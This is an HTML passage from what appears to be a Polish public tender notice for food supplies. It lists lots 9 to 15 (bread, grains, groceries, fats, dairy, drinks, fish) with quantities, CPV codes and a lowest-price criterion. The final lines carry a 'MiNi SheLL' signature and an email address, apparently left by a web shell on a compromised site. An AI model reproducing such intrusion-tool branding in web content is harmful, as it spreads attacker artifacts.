<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chleb krojony0,6kg	szt	50
chleb forma 0.5	szt	10
chleb słonecznikowy 0,5 	szt	10
chleb sojowy 0.5	szt	10
chleb razowy 0,5	szt	20
chleb wiejski 1kg	szt	12
ciastka drożdżowe 100g	szt	360
ciasta różne	kg	15
bułki 100g	szt	100
bułki 50g	szt	400
bułki hamburger	szt	60
rogal 100g	szt	60
bułka tarta	kg	12
bułka tarta 0,5kg	szt	10
pączki 100g	szt	360
ciastka francuskie	szt	360.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 - produkty skrobi - mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza manna	kg	6
kasza gryczana 5x100gkg	szt	10
kasza gryczana 1kg	szt	5
kasza jęczm. drobna	kg	10
kasza jęczm. Średnia	kg	10
kasza jęczm. Średnia 5kg	szt	4
kasza pęczak	kg	15
mąka krupczatka	kg	10
mąka pszenna typu 500	kg	50
mąka pszenna typu 450	kg	50
mąka ziemiaczna	kg	12
płatki owsiane	kg	3
płatki kukurydz. 250G	szt	3
platki kukur. 500 g	szt	3
platki kuku.kakaowe 250g	szt	4
platki kukur.kakaowe 500g	szt	4
płatki  nestle chocapic	szt	10
płatki 500g typu kangus	szt	10
ryż 1kg  	szt	20
ryż w woreczkach 0,5kg	szt	24
ryż 1kg	kg	36.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11 - różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baton   	szt	360
baton  milki way	szt	360
bato  lion	szt	360
baton  	szt	360
barszcz czerwony 220ml	szt	24
bialy barszcz	szt	50
budyń	szt	50
chrupki kukurydziane	szt	5
ciastka w polewie	kg	12
ciastka kruche	kg	12
ciastka typy pierniki	kg	12
ciastka typu wafelki	kg	12
Ciastka-rolada  300g	szt	20
cukier	kg	250
cukier puder  0,5 kg	szt	10
cukier waniliowy	szt	20
cukier kostka	kg	10
cukierki czekoladowe	kg	12
cukierki typu krówki	kg	12
cukierki typu szklaki	kg	12
cukierki owocowe	kg	12
cynamon 0,20g	szt	24
czekolada z orzechami	szt	90
czekolada nadziewana	szt	180
czekolada pełnomleczna	szt	180
czipsy	szt	180
draże mleczne	szt	190
drożdże 100g	szt	24
galaretka owocowa	szt	80
gofry	szt	180
herbata expres 100 szt	szt	12
herbata expres 50 szt	szt	20
herbata expr. Mietowa 20szt	szt	10
hebata expres owocowa 25szt	szt	10
herbata granulowana 100g	szt	15
herbata owoc.rozpusz gran.	szt	10
herbata l100szt  lub równoważna	szt	12
herbata  50 szt  lub równoważna	szt	10
herbata zielona expre25szt	szt	20
jarzynka 200g	szt	12
jarzynka 1kg	szt	10
Jarzynka 0,5 kg	szt	7
Kawa zboż-expr. typu anatol  lub równoważna	szt	12
kawa rozpuszczalna zboż	szt	12
kawa rozpusz. Neskaffe 200g  lub równoważna	szt	12
kawa rozpuszcz. Neskaffe 100g  lub równoważna	szt	12
kawa rozpuszczalna 100g	szt	12
kawa rozpuszczalna 200g	szt	12
kawa typy capucino  lub równoważna	szt	24
kawa naturalna mielona 250g	szt	24
kawa naturalna mielona 500ml	szt	24
kawa  premium 250g  lub równoważna	szt	20
kawa premium 500g  lub równoważna	szt	12
kakao typu puchatek	szt	12
keczup 500g 	szt	48
keczup pikantny 0.5 	szt	24
Keczup 1 l	szt	10
keczup wiadro	szt	1
kisiel	szt	65
kisiel expr słodka chwila  lub równoważny	szt	180
kminek 20g	szt	25
kotlety sojowe  0,35	szt	20
kotlety sojowe 0,5	szt	10
krem czekoladowy 200g	szt	5
krem czekoladowy 400g	szt	5
krem czekolad.nutella  lub równoważny	szt	6
krem czek.  250gszt  lub równoważny	szt	12
kurkuma	szt	25
kwasek cytrynowy	szt	25
kwasek cytrynowy 0,5kg	szt	1
liść laurowy 12g	szt	25
liść laurowy 500g	szt	1
lizak    lub równoważny	szt	300
lizak 	szt	300
lizak typu serduszko	szt	300
Łazanki 0.5	szt	20
magi w plynie 1 l	szt	12
mak -puszka 500g	szt	6
makaron nitki  0.5 kg	szt	24
makaron gniazda 1kg 	szt	24
makar. gniaz. 0,5kg lubella	szt	24
makaron kokardy 3 kg	szt	9
makaron rurki 1 kg	szt	12
makaron paczka 	szt	12
makaron świderki 1kg	szt	12
makaron spagetti 0,5kg	szt	12
makaron zacierka	szt	24
majeranek 20g	szt	20
majeranek 150g	szt	6
majeranek 500g	szt	6
majonez sałatkowy 350g	szt	36
majonez  sałatkowy 700g	szt	24
majonez sałatkowy 900g	szt	12
majonez sałatkowy 3kg 	szt	3
majonez majonez  5kg	szt	2
miód sztuczny 200g	szt	6
miód sztuczny  5kg	szt	1
Miód naturalny 0,9 l	szt	5
musztarda 	szt	24
musztrda tuba 0.5 l	szt	36
musztarda 1l	szt	12
Ocet 10%	szt	24
paluszki solone 0,400g	szt	180
paluszki	szt	180
paluszki z sezamem	szt	180
papryka mielona 20g	szt	24
papryka mielona słodka1kg	szt	4
papryka miel. Pikantna 1kg	szt	3
paprykarz szczeciń 131g	szt	15
paprykarz szczcz. 300G	szt	15
pasztet wielkopolski 131g lub równoważny	szt	96
pasztet wielk.z pomid. 131G  lub równoważny	szt	15
pasztet wielk. Z koper. 131G lub równoważny	szt	15
pieprz mielony 20g	szt	60
pieprz mielony 1000g	szt	3
pieprz w ziarnkach 20g	szt	60
pieprz w ziarnkach 1kg	szt	3
pieprz ziolowy 20g	szt	60
pieprz ziolowy 1 kg	szt	3
polewa do lodów 1 l	szt	12
polewa do lodów 250g	szt	12
proszek do pieczenia	szt	60
przyprawa gyros 30	szt	60
przyprawa gyros 0,700g	szt	3
przyprawa do bigosu 0,3	szt	30
przyprawa do grilla 20g	szt	50
przyprawa do grilla 1kg	szt	3
przyprawa do kurczaka 1 kg	szt	3
przyprawa do kurczaka	szt	100
przyprwa do ryb 30g	szt	40
przyprawa do ryb 600g	szt	3
puure ziemn. z boczkiem	szt	90
rosól drobiowy 1 kg	szt	24
rosół drobiowy kost.	szt	20
soda spożywcza	szt	25
sos  bolones 0,500l	szt	40
sos chili 1l	szt	10
sos czosnkowy 1 l	szt	14
sos czosnkowy 250ml	szt	24
sos do deserów 1 l	szt	12
sos do hamburgerow 1 l	szt	10
sos do spagetti	szt	30
sos bolone 1 kg	szt	3
sos neapoli 1kg	szt	3
sos mix koper-zioł, włoski itp 0,700	szt	3
sos salatkowy mix 700g	szt	3
sos słodko-kwaśny	szt	48
sos sojowy 1l	szt	3
sos sojowo-grzybowy 	szt	3
sól	kg	95
sól konserwowa	kg	5
Wafle-miseczki 	szt	350
wafelek duży(wafel z kremem typu murzynek)	szt	180
wafelek mały(wafel z kremem typu murzynek)	szt	180
wafelek w polewie	szt	180
wafelek typu grześ w polewie	opk	12
wafelek b/polewy typu grzesiek  lub równoważny	szt	180
wafelek b/polewy typu grzesiek  lub równoważny	opk	12
warzywko 200g	szt	30
warzywko 500g	szt	6
Warzywko 1 kg	szt	12
wiórki kokosowe 0,25	szt	3
Zasmazka 1 kg	szt	6
ziele angielskie	szt	25
ziele angielskie 600g 	szt	3
zupki typu chińska(ostra,łagodna rosołowa itp.)	szt	90
zupki typu chiska(rosołowa-ostra/lagodna,krabowa itp.)	szt	90
zupki typu chińska(pomidorowa, barszcz,itp)	szt	90
zelatyna 50g	szt	25
Żelatyna 1 kg	szt	3
żurek w butelce	szt	24
zurek w proszku	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12- oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> margaryna z masłem lub równoważny	szt	24
margaryna  0,5 kg 	szt	24
masło roślinne 200g	szt	48
oliwa z oliwek 1 l	szt	12
olej 1l	szt	50
olej 3l	szt	12
olej 5l	szt	3
smalec	kg	2
smalec 200g	szt	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13 - produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> deser	szt	300
deser  monte  lub równoważny	szt	300
jogurt pitny	szt	300
jogurt  fantazja  lub równoważny	szt	300
jogurt  gratka lub równoważny	szt	300
jogurt  jogutek lub równoważny	szt	300
jogurt  serduszko  lub równoważny	szt	300
lody 100g	szt	300
Lody-rolada 850g	szt	10
lody 1000g	szt	10
kefir 0,5l	szt	210
masło śmietank. 200G	szt	20
maślanka owocowa 0,5	szt	210
Mleko 2% 1l	szt	12
Mleko 3,2% 1l	szt	24
ser feta	szt	3
serek grani	szt	120
serek grani ze szczypiorem	szt	120
serek homogenizowany	szt	210
serek homogenizowany owoc.	szt	210
serek kanapk. Twarożk. 150g	szt	24
serek twaroż.  Almette  lub równoważny	szt	12
ser twarogowy 200g	szt	20
ser twarogowy półtusty	kg	6
set topiony  hochland	szt	30
ser topiony  laktima lu równoważny	szt	30
ser top. krążek  hochl.	szt	30
ser topiony zegar 80g	szt	30
ser salami	kg	3
ser wędzony	kg	3
ser żółty typu edamski	kg	3
ser żółty typu królewski	kg	3
ser żółty typu morski	kg	3
ser żółty typu szwajcar	kg	3
śmietanka jednoraz. 10Szt	szt	1000
śmietana w spray 0,5	szt	45
Śmietana 18% 0,5 l	szt	48
Śmietana 18% 1l	szt	24
Śmietana 30%  0,5 l	szt	48
Smietana 30% 1l	szt	48.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14 - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napoje gazowane 1,5 l	szt	360
napoje niegazowane 1,5 l	szt	180
napój gazowany 2l	szt	180
napój n/g 2 l	szt	180
napój  typu frutti  lub równoważny	szt	360
napój owocowy 	szt	360
mnapój energet. 	szt	360
Woda mineral. 0,5 gaz	szt	360
Woda mineralna 0,5 n/g	szt	360
Woda mineralna n/g 0,5 l 	szt	360
woda mineral. G 0,,5 l 	szt	360
woda mineral. n/g 1,5 l 	szt	180
Woda mineralna g 1,5 l  	szt	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15 - przetwory rybne i ryby wędzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> łosoś sałatkowy 100g	szt	5
łosoś sałatkowy 	szt	5
lłosoś wędzony	kg	6
matijas	kg	6
mintaj wędzony	kg	3
paluszki rybne	kg	60
paprykarz 156g	szt	5
pstrąg wędzony	kg	2
szprot w pomidorach	szt	30
śledź w pomidorach	szt	30
tuńczyk  w sosie wł. 250G	szt	15
tunczyk w oleju 300g	szt	15
węgorz wędzony	kg	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com